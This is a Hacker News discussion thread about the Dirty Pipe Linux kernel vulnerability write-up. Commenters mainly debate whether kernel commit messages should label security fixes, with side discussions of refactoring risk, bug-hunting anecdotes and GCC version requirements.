The Dirty Pipe Vulnerability (cm4all.com)
697 points by max_k on March 7, 2022 | 240 comments



An example that needs to be in the textbooks. A detailed explanation and a timeline along with the code snippets. It succinctly shows you the complexities involved. Kudos to Max for putting it all into the post.

> Blaming the Linux kernel (i.e. somebody else’s code) for data corruption must be the last resort.

^^^ I can only imagine the stress levels at this point.


The magic for me was the two little C programs that demonstrated the bug.

Circa 10 lines of C. Beautiful.


Yes, being able to replicate the issue in a small piece of code is a very good thing.

First it helps to triage whether the bug is in your own code or in other code.

You also then can use it like the author and find the commit which introduced the bug.

And you can use it as a test case to verify if the bug is closed.


I've personally found bugs in unpopular kernel APIs. I spent days thinking it was my code until I went and read the Linux implementation.


ESP-IDF has so many bugs that it’s often the first thing to blame when we hit issues, even when it turns out to be our code after all, haha


Yes, this is an extremely well written and to the point writeup.


Usually I don't read too deeply into CVEs because they are too complex, but this article made me go holy sh-

wish more would be written like this


This reminds me of my time working directly on crypto toolkits.

Every few months, someone would always come up with a reason why "bad entropy" was the cause of a bug.

It never was, but it felt like a thing we had to go through, to get to the real cause.


10 years ago I found an even more outrageous bug in Windows 8.

I was working at MSFT back then, writing a tool that produced 10 GB of data in TSV format, which I wanted to stream into gzip so that the file could later be sent over the network. When the other side received the file they would gunzip it successfully, but inside there would be mostly correct TSV data with some chunks of random binary garbage. It turned out that the pipe operator was somehow causing this.

As a responsible citizen I tried to report it to the right team, and there I ran into problems. Apparently no one in Windows wants to deal with bugs. It was ridiculously hard to report this while being an employee; I can't imagine anyone being able to report similar bugs from outside. And even though I reported that bug, I saw no activity on it when I was leaving the company.

However, I just tried to quickly reproduce it on Windows 10 and it wouldn't reproduce. Maybe I forgot some details of that bug or maybe indeed they fixed this by now.


Worked there too at one point. It can be a struggle to find the right feature team. Once you do, if you can get it triaged, unless it’s high sev high priority it’s getting kicked to the next time period.

Glad it looks like they got around to it though.


> Maybe I forgot some details of that bug or maybe indeed they fixed this by now.

There are lots of things that have been fixed in Windows 10; I'd go so far as to say 1903 (19H1) is where things started to settle down, but even the latest versions are not perfect. When the Israeli/Palestinian conflict broke out in 2019, some of the US military computers started playing up for about a week, after the US vetoed something at the UN level regarding this conflict. So MS still has a long way to go to get things secure.


Another example of a vulnerability that is purposefully obfuscated in the commit log. It is an insane practice that needs to die. The Linux kernel maintainers have been doing this for decades and it's now a standard practice for upstream.

This gives attackers an advantage (they are incentivized to read commits and can easily see the vuln) and defenders a huge disadvantage. Now I have to rush to patch whereas attackers have had this entire time to build their POCs and exploit systems.

End this ridiculous practice.


I've described how we (the kernel security team) handle this type of thing many times, and even summarized it in the past here: http://www.kroah.com/log/blog/2018/02/05/linux-kernel-releas... Scroll down to the section entitled "Security" for the details.

If you wish to disagree with how we handle all of this, wonderful, we will be glad to discuss it on the mailing lists. Just don't try to rehash all the same old arguments again, as that's not going to work at all.

Also, this was fixed in a public kernel last week, what prevented you from updating your kernel already? Did you need more time to test the last release?

Edit: It was fixed in a public release 12 days ago.


I'm well aware of your policy. Yes, I disagree. Also, mailing lists suck and I'll continue to comment wherever I please about the matter.

> Just don't try to rehash all the same old arguments again, as that's not going to work at all.

No shit. People have been trying to explain all of this to you for decades lol I'm not stupid enough to think I'll succeed where they've failed.


I don't know what you don't understand: EVERY single kernel release fixes a few vulnerabilities. If you lazily refuse to update because none of those say "hint: there is a vulnerability here", then you are taking the deliberate action of skipping some security fixes. Greg's announcements always say "all users must upgrade". If there were sometimes a different signal such as "all users must really really really upgrade", then for sure you would simply skip all the other ones, as it already seems like you're waiting for a lot of noise before deciding to apply due fixes, and you would remain vulnerable to plenty of other vulns for much longer.

Here the goal was to make sure that all those who correctly do their job are fixed in time. And they were. Those who blatantly ignore fixes... there's nothing that can be done for them.


So you update your kernel for every single commit as soon as it's merged in? If not, you already obviously understand how ridiculous your argument is.

I've already explained that most people have some sort of cadence for updating.

Based on your other comments you're just going to ignorantly parrot Greg's talking points. I don't think you have much insight into this.


> I don't think you have much insight into this.

I don't think you know who wtarreau is.


I obviously am very comfortable disagreeing with people who work on the kernel or adjacent software. Working in those areas does not at all make them correct, or even informed, especially with regards to security.


What’s amusing is a few years back there WAS a security bug so critical that they DID handle it in a special and strange way.


Yes, and because of that, we created a new process for those types of issues (i.e. broken hardware problems that need more coordination.) That process is documented at https://www.kernel.org/doc/html/latest/process/embargoed-har... if you are curious.

It's been working semi-well, and gives us a way to deal with longer embargo times (like months instead of weeks and days), but it does not integrate well into the linux-distro-like way of working just yet, which is an issue that hopefully will be resolved sometime in the future if the linux-distro members wish it to be.


> When doing kernel releases, the Linux kernel community almost never declares specific changes as “security fixes”. This is due to the basic problem of the difficulty in determining if a bugfix is a security fix or not at the time of creation. Also, many bugfixes are only determined to be security related after much time has passed, so to keep users from getting a false sense of security by not taking patches, the kernel community strongly recommends always taking all bugfixes that are released.

> Linus summarized the reasoning behind this behavior in an email to the Linux Kernel mailing list in 2008 ...

Since severity can be a moving target, it seems like there is no straightforward solution. With that said, by hiding the known ones, older distros don't have a hope in hell of getting all reported CVE fixes back-ported.

Why isn't there a public index mapping known CVE fixes to git commit IDs? This seems totally doable and would make the world a more secure place overall.


> older distros don't have much of a hope in hell of getting all reported CVE fixes back-ported

Older distros have always had a ton of privilege escalation bugs and I don’t think that’s ever gonna change. If you can’t keep everything updated, your machines have to be single-tenant.


Greg would also discourage you from getting a CVE assigned at all, so you might be barking up the wrong tree.


What should they do instead? You have to rush to patch in any case. If the maintainers start to label commits with "security patch", the logical conclusion is that a commit doesn't require immediate action when the label is not there. Never mind that the bug might actually be exploitable but undiscovered by white hats.

If you do not want to rush to patch more than you have to, use a LTS kernel and know that updates matter and should be applied asap regardless of the reason for the patch.


> What should they do instead?

When someone submits a patch for a vulnerability, label the commit with that information.

> You have to rush to patch in any case.

The difference is how much of a head start attackers have. Attackers are incentivized to read commits for obfuscated vulns - asking defenders to do that is just adding one more thing to our plates.

That's a huge difference.

> the logical step is that it doesn't require immediate action when the label is not there.

So I can go about my patch cycle as normal.

> Never mind that the bug might actually be exploitable but undiscovered by white hats.

OK? So? First of all, it's usually really obvious when a bug might be exploitable, or at least it would be if we didn't have commits obfuscating the details. Second, I'm not suggesting that you only apply security labeled patches.


Don't know why your other comment got downvoted. Silently patching bugs has left many LTS kernels vulnerable to old bugs, because they weren't tagged as security fixes. It also leads to other issues: https://grsecurity.net/the_life_of_a_bad_security_fix

See also: https://twitter.com/spendergrsec


Not just downvoted. Flagged lol


For what it's worth, the link gregkh pointed you to answers your first two points.

Your last point is wrong. Simple example: which of the following thousand bugs are exploitable? https://syzkaller.appspot.com/upstream

If you can exploit them, you can earn 20,000 to 90,000 USD on https://google.github.io/kctf/vrp


I've read the post before, I've seen the talk, and frankly it's been addressed a number of times. It's the same silly nonsense that they've been touting for decades ie: "a bug is a bug".


They don’t even need to label it security, just an “upgrade now, upgrade soon, upgrade whenever”.

But they clearly don’t want to, nor care about, making that call (and even more clearly they basically expect everyone to run the latest kernel at all times; and if you run into a bug there, no doubt you'll be told not to run the latest kernels).


I think you missed my point. Attackers will go through commits regardless of a "Security Patch" tag.

But going about your patch cycle as normal for things not labelled "Security Patch" just means that if a patch should have been tagged but for some reason wasn't, you're in the same situation.

I do see the value in your approach, but it just does not change anything for applications where security is top priority.


> What should they do instead?

Well Xen for instance includes a reference to the relevant security advisory; either "This is XSA-nnn" or "This is part of XSA-nnn".

> If the maintainers start to label commits with "security patch" the logical step is that it doesn't require immediate action when the label is not there. Never mind that the bug might actually be exploitable but undiscovered by white hats. If you do not want to rush to patch more than you have to, use a LTS kernel and know that updates matter and should be applied asap regardless of the reason for the patch.

So reading between the lines, there are two general approaches one might take:

1. Take the most recent release, and then only security fixes; perhaps only security fixes which are relevant to you.

2. Take all backported fixes, regardless of whether they're relevant to you.

Both Xen and Linux actually recommend #2: when we issue a security advisory, we recommend people build from the most recent stable tip. That's the combination of patches which has actually gotten the most testing; using something else introduces the risk that there are subtle dependencies between the patches that haven't been identified. Additionally, as you say, there's a risk that some bug has been fixed whose security implications have been missed.

Nonetheless, that approach has its downsides. Every time you change anything, you risk breaking something. In Linux in particular, many patches are chosen for backport by a neural network, without any human intervention whatsoever. Several times I've updated a point release of Linux to discover that some backport actually broke some other feature I was using.

In Xen's case, we give downstreams the information to make the decisions themselves: if companies feel the risk of additional churn is higher than the risk of missing potential fixes, we give them the tools to do so. Linux more or less forces you to take the second approach.

Then again, Linux's development velocity is way higher; from a practical perspective it may not be possible to catch the security angle of enough commits; so forcing downstreams to update may be the only reasonable solution.


Do you have actual evidence of that in a case like this?

(This is not a rhetorical question. I can possibly influence this policy, but unsubstantiated objections won’t help.)


Not OP, but please do try to influence this policy if you can:

1. The commit message [1] does not mention any security implication. This is reasonable, because the patch is usually released to the public earlier and it makes sense to do some obfuscation, to deter patch-gappers. But note that this approach is not a controversy-free one.

2. But there is also no security announcement in stable release notes or any similar stuff. I don't know how to provide evidence of "something simply does not exist".

3. Check the timeline in the blog post. The bug being fixed in a stable release (5.16.11, on 2022-02-23) marks the end of upstream's handling of this bug. Max then had to send the bug details to the linux-distros list to kick off (as another, separate process) the distro maintainers' response. If what you are maintaining is not a distro, good luck.

Is this wrong-sounding enough?

[1] https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/lin...


#1 is intentional, for better or for worse. It’s certainly well-intentioned too, although the intentions may be based on wrong assumptions.

#2: upstream makes no general effort to identify security bugs as such. Obviously this one was known to be a security bug, but the general policy (see #1) is to avoid announcing it.

#3: In any embargo situation, if you’re not on the distribution list, you don’t get notified. This is unavoidable. oss-security nominally handles everyone else, but it’s very spotty.

Sometimes I wish there was a Linux kernel security advisory process, but this would need funding or a dedicated volunteer.


> Sometimes I wish there was a Linux kernel security advisory process, but this would need funding or a dedicated volunteer.

This is already happening https://osv.dev/list?q=Kernel&affected_only=true&page=1&ecos...


As far as I know, this doesn’t get information from upstream maintainers. For this to work well, I think we would want actual advisories generated around commit time, embargoed early notification, and a process for publication.


TBH the thing that annoyed me most in this story is the "Someone had to start the disclosure process on linux-distros again and if they didn't no one would know" part. There are certainly silent bug fixes where the author intentionally (or not) does not post to linux-distros or any other mailing lists even after the stable release. It would take an hour to dig up a good example though. (Okay, maybe 10 minutes if I'm going to read Brad Spengler's rants)

I guess a Linux kernel security advisory process is needed to fix this, but yeah :(


For what it’s worth, linux-distros has its own opinions that are not necessarily compatible with those of the upstream kernel.


If only there was some kind of foundation with a revenue of $177 million last year which had an interest in Linux's success.


they are busy doing blockchain projects :)


Evidence of what, exactly? I can find you lots of evidence for hiding vulns, they don't even hide it - I'm sure Greg will admit to as much.

Evidence of this being helpful to attackers and not defenders? IDK, talk to anyone who does Linux kernel exploit development.

edit: There you go, Greg linked his policy, which explicitly notes this.


This is about the commit that fixed the bug, not the commit that introduced the bug. The accusation is not that linux developers intentionally introduced a vulnerability. Instead it is that linux developers hid that a commit fixed a vulnerability. Linux does this to prevent people from learning that the vulnerability exists.


> Linux does this to prevent people from learning that the vulnerability exists

No, not at all, just to leave users time to deploy the fix before everyone jumps on exploits. This is important because every single backported patch is a candidate for an exploit already, and it's only a matter of time before any of them is exploited. That's the reason why embargoes have to stay short. It takes some time to figure out whether a bug may have security impact; once that is figured out, it takes much less time to develop an exploit.

By the way, it could really have happened that the fix for the data corruption would have been merged first, and only later the author figured out there was a security impact. And the patch wouldn't have been any different. That's why leaving 1-2 weeks for the fix to flow via distros to users, and having the author post a complete article, is by far the best solution for everyone.


Nobody is arguing that users having a 1-2 week patch window is a bad thing. However, this frankly seems incompatible with open-source projects. Silently patching issues does not work in practice; it frequently leads to missed fixes, misapplied patches and other incompatibility woes. The situation with backports and LTS releases showcases this well: the only truly well-supported kernel is the latest. Everything else is a patchwork of best-effort fixes, not all of which may have been applied correctly. Brad Spengler of grsecurity fame talks frequently about this (primarily via Twitter): https://twitter.com/spendergrsec


Not really. As you say, there's an extremely difficult balance between open source and not exposing everyone at once. You can't get a fix deployed everywhere without it being public first, or it ends up in a total unfixable mess. But if the fix is public and gives too much info (the exploit procedure), then you put everyone in danger until the fix flows to users.

Thus the only solution is to have a public fix describing the bug but not necessarily all the details, while distros prepare their update, and everyone discloses the trouble at the same time. Those who need early notification MUST ABSOLUTELY BE on linux-distros. There's no other way around it. As soon as the patch is published, the risk is non-null and a race starts between those who look for candidate fixes and those who have to distribute fixes to end users.

This is not about silently patching or hiding bugs, quite the opposite: it's about making them public as quickly as possible so that the fix can be picked up, but without the unneeded elements that help vandals damage shared systems before those systems have a chance to be updated. Then it is useful that the reporter communicates about their finding; this often helps improve general security by documenting how certain classes of bugs turn into security issues (Max did an awesome job here, probably the best such bug report in the last few years). And distros need to publish more details as well in their advisories, so details are not "hidden", they're just delayed during the embargo. Those who are not notified AND who do not follow stable are simply irresponsible. But I don't think there are that many doing that nowadays, possibly just a few hero admins in small companies trying to impress their boss with their collection of carefully selected patches (which render their machines even more vulnerable and tend to make them vocal when such issues happen).

In addition it's important to keep in mind that some bugs are discovered to be exploitable long after being fixed. That's why one MUST ABSOLUTELY NOT rely on the commit message alone to decide whether they are vulnerable or not, since it's quite common not to know upfront. I remember a year or two ago someone from Google's security team reported a bug in haproxy that could cause a crash in the HPACK decoder. That was extremely embarrassing as it could allow anyone to remotely crash haproxy. We had to release the fix indicating that the bug was critical and that the risk of crashing when facing bad data was real, without explaining how to crash it (since, like a kernel, it's a component many people tend to forget to upgrade). Then after the fix was merged, I was still discussing with the reporter and asked "do you think it could further be abused for RCE?". He said "let me check". A week later he came back saying "good news, I succeeded". No way to get that info in the commit message even if we wanted to, since it was too late. Yet the issue was important.

Speaking of Brad, I personally think that grsec ought to be on linux-distros, but maybe they prefer not to appear as "tainted" by early notifications, or maybe they're having some fun finding other issues themselves. We even proposed Brad to be on the security list, because he has the skills to help a lot and improve the security there. He could have interesting writeups for some of the bugs, and it would probably change his perception of what happens there. Maybe one day he'll accept (still keeping hope :-)).


Can you say what you're hoping to do? LK devs tag security fixes with "[SECURITY]" and then what? You would merge individual [SECURITY] commits into your tree?

Currently the situation is that you can just follow development/stable trees right (e.g. [0])? Why would you only want the security patches (of which there look to be a lot just in the last couple weeks). Are you looking to not apply a patch because LK devs haven't marked it as a security patch?

[0]: https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux...


Assume I patch my Linux boxes once a month. I see a commit where an attacker has a trivial privesc. I read the commit, see if it's relevant to me, and potentially decide to do an out of cycle patch. As in, instead of updating next month I'll just update now.


Gotcha. Yeah it does seem like there's some space between the overpromising "I am a Linux Kernel Dev and I proclaim this patch is/is not a security patch" and the underpromising "I am a Linux Kernel Dev and have no knowledge of whether or not this is a security patch". It doesn't seem unreasonable to mark it somehow when you know.

On the other hand, just on that page I linked, there's... a lot of issues in there I would consider patching for security reasons. I don't know how reasonable it is, given the existing kernel development model, to tag this stuff in the commit. The LTS branches pull in from a lot of other branches, so like, which ones do you follow? When Vijayanand Jitta patches a UAF bug in their tree, it might be hanging out on the internet for a while for hackers to see before it ever gets into a kernel tree you might consider merging from.

I guess what I'm saying here is that it seems like a lot to ask that if I find a bug, I:

- don't discuss it publicly in any way

- perform independent research to determine whether there are security implications

- if there are, ask everyone else to keep the fix secret until it lands in the release trees with a [SECURITY] tag

- accept all the blame if I'm ever wrong, even once

That too is a lot of overhead and responsibility. So I'm sympathetic to their argument of "honestly, you should just assume these are all security vulns".

So maybe this is just a perspective thing? Like, there are a lot of commits, they can't all be security issues right? Well of course they can be! This is C after all.

Like in that list, there's dozens of things I think should probably have a SECURITY tag. Over 14 days, let's just call that 2 patches a day. I'm not patching twice a day; it's hard for me to imagine anyone would, or would want to devote mental bandwidth to getting that down to a manageable rate ("I don't run that ethernet card", etc.)

So for me, I actually kind of like the weekly batching? It feels pragmatic and a pretty good balancing of kernel dev/sysadmin needs. Can I envision a system that gave end-users more information? Yeah definitely, but not one that wouldn't ask LK devs to do a lot more work. Which I guess is a drawn out way of saying "feel free to write your own OS" or "consider OpenBSD" or "get involved in Rust in the kernel" or "try to move safer/microkernel designs forward" :).


I think some important context here is that the people who want commits obfuscated are never the ones making a decision about the security label. The people writing the commit already know it's a security issue.


> The people writing the commit already know it's a security issue.

For this special case, yes. But for the vast majority of bugs it's the opposite and existing bugs get exploited later, thanks to some people who think that some patches are not security-related and do not apply the fixes.


Then please just consider that every single stable kernel contains 1 or 2 fixes for similar vulnerabilities that nobody took the effort to try to exploit. THIS is the reality.


That's definitely not the reality at all, and it's also not actionable.


Are you saying that you are able to read all incoming linux patches, and easily identify changes which fixes a security problem, so that you can come up with a POC by the time the security issue is announced?

If the patch was flagged as a security problem from the beginning, it would give advantage to attackers, since they would know that the particular patch is worth investigating, while the defenders would have to wait for the patch to be finalized and tested anyway.


> Are you saying that you are able to read all incoming linux patches, and easily identify changes which fixes a security problem, so that you can come up with a POC by the time the security issue is announced?

Their point is that a full-time attacker (and there's enough money in it to do it as a full-time job these days) can look for obfuscated commits and take the time to deobfuscate them, whereas a defender doesn't have that kind of time.


I agree, that is definitely possible. That said, it requires a lot of work, since there are a lot of incoming patches. I wonder how many people would have to review every proposed patch, how to select the subset of incoming patches for human review, and how much one would have to pay a team doing all this, to get reasonable results and a return on investment.

My point was that if security patches are flagged as such from the start, it saves attackers a lot of time (and money), as they will no longer have to go through (almost) every patch and evaluate whether it could be fixing a security problem. This means that such a scenario will get a lot cheaper, while the defenders won't gain much from it, as one still needs to wait for the fix to be finalized and tested before deploying it in a production environment.


Security researchers already know that they're submitting a patch for a security flaw - there is 0 additional overhead.

> My point was that if security patches are flagged as such from the start, it saves attackers a lot of time (and money), as they will no longer have to go through (almost) every patch and evaluate whether it could be fixing a security problem.

Not really.

1. They can just check to see who made the commit - if it's a security researcher, it's obviously a vuln patch

2. The commits are obfuscated in hilariously obvious ways if you know what to look for

3. It's not that hard to look at a commit, it's kinda what they're paid for

> while the defenders won't gain much from that,

When the vuln is found a race begins between attacker and defender. The difference is that attackers know they're in a race and defenders find out two weeks later.


Your 3 points above are true, but this is a perfect example where they didn't apply. A perfectly regular bug, found by someone affected by it who then started to wonder whether or not it could lead to more interesting effects. Also, the "attackers" you're talking about are more interested in the bugs that are not yet fixed, as those are more durable. The goal here is mostly to protect against vandals who do not have such skills but find it fun to sabotage systems. Multiply the max lifetime of critical bugs by the number that are found every year and you'll figure out the number of such permanent issues that affect every system and that some people are paid to look for and exploit. This is where their business is. Those people will at best try to sell their exploits when seeing the fix reach stable, as they know that within two weeks it won't work anymore, so better to get a last opportunity to make money out of it.


These are interesting points, maybe my assumptions about cost of this analysis are wrong.


You have it completely backwards.


You have it the wrong way around. Tagging the release as a security release allows nation-state level attackers with large budgets to investigate the fixes, while normal people have to wait for patches. This gives nation-state level attackers with large budgets a heads-up, making it worse for everyone else. Furthermore, nation-state level attackers with large budgets are more focused on offense than defense.


This comment is totally baseless. Anyone who does linux kernel exploit development knows how to crawl the commit log or syzkaller.


I'm sorry, but I'm not a nation-state. I wish I was though.


Attackers with the resources and patience to read and deeply analyze all the commits, over time... those guys were fairly likely to notice the bug back when it was introduced. Plain vs. obscure comments on the patch don't much matter to them. Low-resource and lower-skill attackers - "/* fix vuln. introduced in prior commit 123456789 */" could be quite useful to them.


I don't think you understand how attackers work.

Attackers don't just crawl code at random. Starting with known crashes or obfuscated commits is always faster.


There are both kinds, and also those who do both.


What is your threat model / situation such that you care about attackers who reverse engineer patches, but are not in the small circle of people who would be informed beforehand?

To me, it seems like the average corporate security team is not going to worry about these kinds of attackers. Security for state secrets might, but they seem likely to be clued in early by Linux developers.

I'm probably missing something tho.


> What is your threat model / situation such that you care about attackers who reverse engineer patches, but are not in the small circle of people who would be informed beforehand?

Virtually every single Linux user. I think what you're missing is how commonplace and straightforward it is for attackers to review these commits and how uncommon it is for someone to be on the receiving end of an embargo.

Most exploits are N-days, meaning they're for vulnerabilities that already have a patch out. Knowing that there's a patch is universally critical for all defenders.

For context, my company will be posting about a kernel (then) 0day one of our security researchers discovered. You can read other Linux kernel exploitation work we've done here: https://www.graplsecurity.com/blog


By threat model I mean, who are you worried about attacking you.

I get that every linux user could be attacked. But why would someone with the relevant knowledge that could pull this off attack a given linux user? Why are you worried about it? (Not trying to be sarcastic, trying to get a sense of what threats you are worried about).


My point is that this is basically just how exploits work for Linux, so it's pretty universal unless your main concern is 0days. As for me personally, I run a company that uses Linux in production. We happen to explicitly do research into Linux kernel security (we'll be publishing tomorrow on a 0day we had reported) https://www.graplsecurity.com/blog


This is why stable branches are a thing. I don't know the branching scheme that the Linux kernel uses, but the idea is that for the oldest (most stable) branch, everything is a (sometimes backported) bugfix with security implications.


The offending commit was authored by Christoph Hellwig and possibly reviewed by Al Viro, who between them hold close to 100% of Linux filesystems and VFS knowledge. Point being, with the level of complexity involved you're just going to have to live with the fact that there'll always be bugs.

VFS/Page Cache/FS layers represent incredible complexity and cross-dependencies - but the good news is that the code is very mature by now and should not see changes like this too often.


And the reason for the commit was to have 'nicer code'. The code was working perfectly fine before someone decided it was not nice enough?


Your post sounds like it's a bad thing, but "nicer" code is easier to maintain, i.e. there will be fewer bugs (and fewer vulnerabilities). This bug is an exception to the rule - shit happens. But refactoring code to be "nicer" prevents more bugs than it causes. Two patches were involved in making this bug happen, and minus the bug, I value both of them (and their authors).


"There are two ways of constructing a software design: One way is to make it so simple that there are obviously no deficiencies and the other way is to make it so complicated that there are no obvious deficiencies."

        — C.A.R. Hoare, The 1980 ACM Turing Award Lecture


I might have sounded harsh, but I think "shit happens" is not the way to look at this. I don't claim I'm a better developer, but I always try to shy away from making things look nicer.

Experience has taught me: deal with problems when they are problems. Dealing with could-be problems can be a deep, very deep rabbit hole.

The commit message gave me the feeling that we should just trust the author.

https://github.com/torvalds/linux/commit/f6dd975583bd8ce0884...


There's no bug in that commit, the commit is correct, it only makes the bug exploitable. The buggy commit is older, it's https://github.com/torvalds/linux/commit/241699cd72a8489c944... but not exploitable.

> I always try to shy away from making things look nicer

That's understandable, though from my experience, lots of old bugs can be found while refactoring code, even at the (small) risk of introducing new bugs.


As (almost) always, the expert's answer is: "It depends". How risky is the change, how big the consequences, how un-nice is the code before, how easy is it to test that the code still works afterwards, etc...

FWIW, I tend to err on the side of "do it", and I usually do it. But I have been in a situation where a customer asked for the risk level, I answered to the best of my knowledge (quite low but it's hard to be 100% sure), and they declined the change. The consequences of a bug would have been pretty horrible, too. Hundreds of thousands of (things) shipped with buggy software that is somewhat cumbersome to update.


While true, it's important to ensure there is adequate test coverage before trying to refactor, in case you miss something.

Also, try to avoid small commits / changes; churn in code should be avoided, especially in kernel code. IIRC the Linux project and a lot of open source projects do not accept 'refactoring' pull requests, among other things for this exact reason.


Agree, but even 100% test coverage can't catch this kind of bug. I don't know of any systematic testing method which would be able to catch it. Maybe something like valgrind which detects accesses to uninitialized memory, but then you'd still have to execute very special code paths (which is "more" than 100% coverage).


Valgrind cannot be used for/in the kernel. However, the kernel has an almost-equivalent use-of-uninitialized-memory detector; https://www.kernel.org/doc/html/v4.14/dev-tools/kmemcheck.ht...


> try to avoid small commits / changes

Not sure what you mean by that


A lot of times, this is just shifting the problem to the future and making life harder.

We have a team like this -- their processes often fail, and their error reporting is lacking in important details. But they are not willing to improve reporting / make errors nicer (=with relevant details); instead they have to manually dig into the logs to see what happened. They waste a lot of time because they "shy away from making things look nicer."


Caveat - I know this doesn't directly apply to the vulnerability at hand, but is a discussion of a tangential view.

> Experience has taught me: deal with problems when they are problems.

Experience has taught me that disparate ways of doing the same thing tend to have bugs in one or more of the implementations. Then trying to figure out if a specific bug exists other places requires digging into those other places.

Make it work. Make it good. Make it faster (as necessary) is the way my long-lived code tends to evolve.


> I always try to shy away from making things look nicer

Anyone who doesn't hasn't been burnt enough so far, but will be in the future.


Nonsense. It's just easy to blame refactoring when it breaks something. "You fool! Why did you change things? It was perfectly fine before.". Much harder to say "Why has this bug been here for 10 years? Why did nobody refactor the code?" even when it would have helped.

Not refactoring code also sacrifices long term issues in return for short term risk reduction. Look at all of the government systems stuck on COBOL. I guarantee there was someone in the 90s offering to rewrite it in Java, and someone else saying "no it's too risky!". Then your ancient system crashes in 2022 and nobody knows how it works let alone how to fix it.


Unless the code is very well covered by unit tests, any refactoring can introduce bugs. If the code is well established and no longer changing, there is no ease of maintenance to be gained. There is only downside to changing it.

If the code is causing more work to maintenance and new development, sure it may make sense to refactor it. Otherwise, like the human appendix, just leave it alone until it causes a problem.


I have the impression that most maintainers and project founders care about the project and the source, contrary to what often happens in industry, where other things are more important {sales, features, marketing, blingbling}.

One of the prevailing features of well-run open-source projects is that you're encouraged to improve the code, i.e. make it better {readable, maintainable, faster, hard}. You're not encouraged to change it for the sake of change, i.e. to impress people.

I have the feeling it is the first case here, because it reduced the number of lines and kept the source readable. Aside from that, I don't think good developers want to impress others.


My reading of the write up was that the new code didn’t introduce the bug, but merely exposed a latent uninitialised memory bug?


Very good point. Often developers talk in cargo-cult terminology like "beautiful" or "nice" or "elegant" code, but there is no definition of what that even means or whether it empirically leads to better (or worse) outcomes. We know people like it more, but that doesn't mean we should be doing it. A true science would provide hypothesis, experiment, repeated evidence, rather than anecdotes.

(from the downvotes it seems like some people don't want software to be a science)


While a scientific approach would be nice, it is hard to do, and even harder to do correctly in a way applicable to the specific situation. And in the absence of such research, all we have is intuition and anecdotes.

And they work both ways -- there are anecdotes that making code beautiful leads to better outcomes, and there are anecdotes that having ugly code leads to better outcomes.

This means you cannot use the lack of scientific research to give weight to your personal opinions. After all, that argument works in either direction ("There is no evidence that leaving duplicate code in the tree leads to worse outcomes... A true science would provide...")


Easy: simpler is better. What is considered simple varies wildly based on one's experience, though.


if it ain't broken, fix it til it is


> Point being, with the level of complexity involved you're just going to have to live with the fact that there'll always be bugs.

I'd like to add, for the less tenured developers around: "with the level of experience involved, you're just going to have to live with the fact that there'll always be bugs."


Do you have an example in mind, for complex software that is bug free?


It’s possible that TeX is some of the most bug-free code around, and bugs are still being found (very much edge cases, to be sure).


This will get worse over time as "more planned obsolescence than anything else" code is committed into the linux kernel. Many parts of the linux kernel are "done", but you will always have some people who manage to commit stuff in order to force people to upgrade. This is very acute with "backdoor injectors for current and future CPUs", aka compilers: you should be able to compile the linux git tree with gcc 4.7.4 (the last C gcc, which has more than enough extensions to write a kernel), and if something needs to be done in linux code closely related to compiler support, it should be _removing_ stuff without breaking such compiler support, _NOT_ adding stuff which makes linux code compile only with a very recent gcc/clang. For instance, in the network stack, tons of switch/case and initializer statements don't use constant expressions. Fixing this in the network stack was refused; I tried. Lately, you can see some linux devs pouring in code using the toxic "_Generic" C11 keyword instead of type-explicit code, and new _mandatory_ builtins have popped up (I detected them in 5.16 while upgrading from 5.13) which are available only in recent gcc/clang. When you look at the pertinence of those changes, they are more "planned obsolescence 101" than anything else. It is really disappointing.
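
For readers who haven't run into it: _Generic is C11's compile-time dispatch on the static type of an expression. A minimal illustration (nothing to do with actual kernel code, just a sketch of what the keyword does):

    #include <stdio.h>

    /* Selects a string based on the compile-time type of the argument;
     * requires a C11-capable compiler (GCC gained support around 4.9). */
    #define type_name(x) _Generic((x), \
            int:          "int",       \
            long:         "long",      \
            unsigned int: "unsigned int", \
            default:      "something else")

    int main(void)
    {
        printf("%s\n", type_name(1));    /* int */
        printf("%s\n", type_name(1L));   /* long */
        printf("%s\n", type_name(1u));   /* unsigned int */
        return 0;
    }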


This kind of argument is hypocritical: You want to use newer versions of the Linux kernel yourself (otherwise you could just stick to whatever builds with your toolchain!), but say that the Linux kernel must not use newer versions of things.

The GCC version requirement is 5.1 (which is 7 years old). Before that, it was 4.9, 4.8, 4.6 and 3.2. It has never been 4.7.

Use of newer versions of C than C89, where they provide solutions to actual issues, is perfectly fine. C11 was picked because it does not require an increase in the minimum GCC version to use it, making your entire argument pointless.

The Linux kernel is already pretty lenient; many alternatives ship a compiler in their tree and target only that.


>you should be able to compile the linux git tree with gcc 4.7.4 (the last C gcc, which has more than enough extensions to write a kernel)

By this logic why not write the entire kernel in assembly? Tools evolve and improve over time and it makes sense to migrate to better tools over time. We shouldn't have to live in the past because you refuse to update your compiler.


That's obviously not their logic at all. Trying to diminish this to "OP refuses to update compiler" is frankly disrespectful of them & their actual point.


To me their logic is that their old tool works just fine so they shouldn't have to upgrade it. He essentially said that having a plan to upgrade to a newer version of the language or to a more up-to-date toolchain is planned obsolescence. He seems to want to be able to use his specific version of his compiler until the end of time. I don't quite get the justification for this perspective, as GCC is free software and it is simple to upgrade.


Thank you, that's a great reply to his comment. My first impression of his comment was that the kernel project shouldn't chase the latest-and-best compiler releases -- or similarly the most recent C language changes; rather, a boring-technology approach is sensible for such a foundational project as Linux. I see your point, though, that GCC is simple to upgrade. (If I were making the tech decision here, I'd want to ensure that newer GCC's didn't introduce features that I thought were too risky for my project, or at least that I could disable/restrict those features with flags.)


GCC 5.1 (released in 2015) is hardly latest-and-best, though: moving the version bar up only very slowly and with an eye to what distros are using as their compiler version is a pretty solid boring-technology approach, in my view.


Their claim is "you should be able to compile the linux git tree with gcc 4.7.4", which is a completely arbitrary requirement.


It's not completely arbitrary. Notice that they said "the last C GCC". After that version, GCC started using C++ in the compiler itself. I can see why some people would see that as a complexity line that must not be crossed, as it makes bootstrapping harder.


What GCC is written in only matters if you intend to write your own compiler to compile it - which, as you have no compiler yet, would likely have to be written in assembly.

Otherwise you need to download a prebuilt compiler anyway, and whether that is C11 or C++11 is rather unimportant.


There was a never-shipped bug in Solaris back around... I want to say 2006? I don't remember exactly when, but there was a bug where block writes in a socketpair pipe could get swapped. I ended up writing a program that wrote entire blocks where each block was a repeated block counter; that way I could look for swapped blocks, and then also use that for the bug report. The application that was bitten hard by this bug was ssh.

Writing [repeated, if needed] monotonically increasing counters like this is a really good testing technique.
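
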